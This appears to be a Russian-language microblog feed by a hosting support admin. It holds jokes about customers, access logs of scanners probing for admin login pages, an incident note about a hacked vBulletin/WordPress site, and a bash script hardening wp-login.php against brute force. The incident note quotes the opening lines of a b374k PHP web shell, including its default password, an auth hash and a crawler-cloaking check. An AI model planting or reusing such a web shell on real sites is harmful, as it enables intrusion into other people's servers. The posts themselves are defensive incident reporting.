Коллеги, ну почему так: если у кастомера в юзернейме есть слова "Linux", "webmaster" или "admin" — вероятность, что он обратится с глупой просьбой, возрастает в разы?
Пришел забавный хацкир. Пытается ломать линукс-хостинг (который в хедерах говорит, что он линукс):
121.56.155.120 — — [17/Mar/2014:05:54:21 -0700] "HEAD /admin888/ewebeditor/fsmkadmin_login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:20 -0700] "HEAD /eweb/dqcqadmin_login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:21 -0700] "HEAD /asp_bin/webeditor/jhyyadmin_login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:22 -0700] "HEAD /admin/editor/usumadmin_login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:21 -0700] "HEAD /loknewebeditor/admin/login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:23 -0700] "HEAD /ewebeditor/mpemadmin_login.asp HTTP/1.1" 404 — "-" "-"
Жуйк, зачем он это делает?
121.56.155.120 — — [17/Mar/2014:05:54:21 -0700] "HEAD /admin888/ewebeditor/fsmkadmin_login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:20 -0700] "HEAD /eweb/dqcqadmin_login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:21 -0700] "HEAD /asp_bin/webeditor/jhyyadmin_login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:22 -0700] "HEAD /admin/editor/usumadmin_login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:21 -0700] "HEAD /loknewebeditor/admin/login.asp HTTP/1.1" 404 — "-" "-"
121.56.155.120 — — [17/Mar/2014:05:54:23 -0700] "HEAD /ewebeditor/mpemadmin_login.asp HTTP/1.1" 404 — "-" "-"
Жуйк, зачем он это делает?
Отличный сервис проверки чейна сертификата, рекомендую. networking4all.com
Надписи над дверями ада 2.0:
No customer impact expected
No interruption expected
No customer impact expected
No interruption expected
Сначала мы замыкаем таблицу из 170000 записей саму на себя по неиндексированному полю, а когда сайт перестает работать — идем и крутим мозги провайдеру. Правильно, на тестовом сайте же все работало, с 50 записями!
Кастомера с вордпрессом какой-то ботнет ломает пустыми POST-запросами. Чатик, в чем логика ломать пустыми POST-запросами? ЧТО ОНИ ХОТЯТ?
1. Взлом кастомерского сайта (вбуллетин+вордпресс) через дырку в буллетине. Нотифицировали кастомера, он обновился, потер хреновые index.php
2. Проходит две недели, появляются новые index.php уже с другим содержанием. Причина — залитый в первый раз htdocs/forum/files.php:
<?php
/ (Web Shell b374k r3c0d3d by x'1n73ct|default pass:"1n73ction") /
$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
<.... to be continued ...>
2. Проходит две недели, появляются новые index.php уже с другим содержанием. Причина — залитый в первый раз htdocs/forum/files.php:
<?php
/ (Web Shell b374k r3c0d3d by x'1n73ct|default pass:"1n73ction") /
$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
<.... to be continued ...>
— Чем тебе юзер пришлет логи на саппорт, если у него почта сломалась?
— netcat'ом
— мда. Суровые русские админы настолько суровы...
— netcat'ом
— мда. Суровые русские админы настолько суровы...
Коллеги, у вас все нормально? Связь с Вирджинией пропала от слова полностью.
А вот и мой способ борьбы с массовым брутфорсом wp-login.php (и защиты шаред-хостинга от большого LA заодно):
#!/bin/bash
export PATH=/sbin/:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/local/bin:/secure/bin
if [ `fgrep 'WordPress User Page' wp-login.php|wc -l` -le 0 ]; then
echo File wp-login.php is not Wordpress-related
exit 2
fi
cp -p wp-login.php wp-login.backup.php
cp -p wp-login.php wp-login.secure.php
sed -i.bak 's/wp-login\.php/wp-login\.secure\.php/g' wp-login.secure.php
echo "<?php
\$action=\$_GET['action'];
\$_wpnonce=\$_GET['_wpnonce'];
if (!is_null(\$action)) header(\"Location: wp-login.secure.php?action=\$action&_wpnonce=\$_wpnonce\");
else header(\"Location: wp-login.secure.php\"); ?> " > wp-login.php
#!/bin/bash
export PATH=/sbin/:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/local/bin:/secure/bin
if [ `fgrep 'WordPress User Page' wp-login.php|wc -l` -le 0 ]; then
echo File wp-login.php is not Wordpress-related
exit 2
fi
cp -p wp-login.php wp-login.backup.php
cp -p wp-login.php wp-login.secure.php
sed -i.bak 's/wp-login\.php/wp-login\.secure\.php/g' wp-login.secure.php
echo "<?php
\$action=\$_GET['action'];
\$_wpnonce=\$_GET['_wpnonce'];
if (!is_null(\$action)) header(\"Location: wp-login.secure.php?action=\$action&_wpnonce=\$_wpnonce\");
else header(\"Location: wp-login.secure.php\"); ?> " > wp-login.php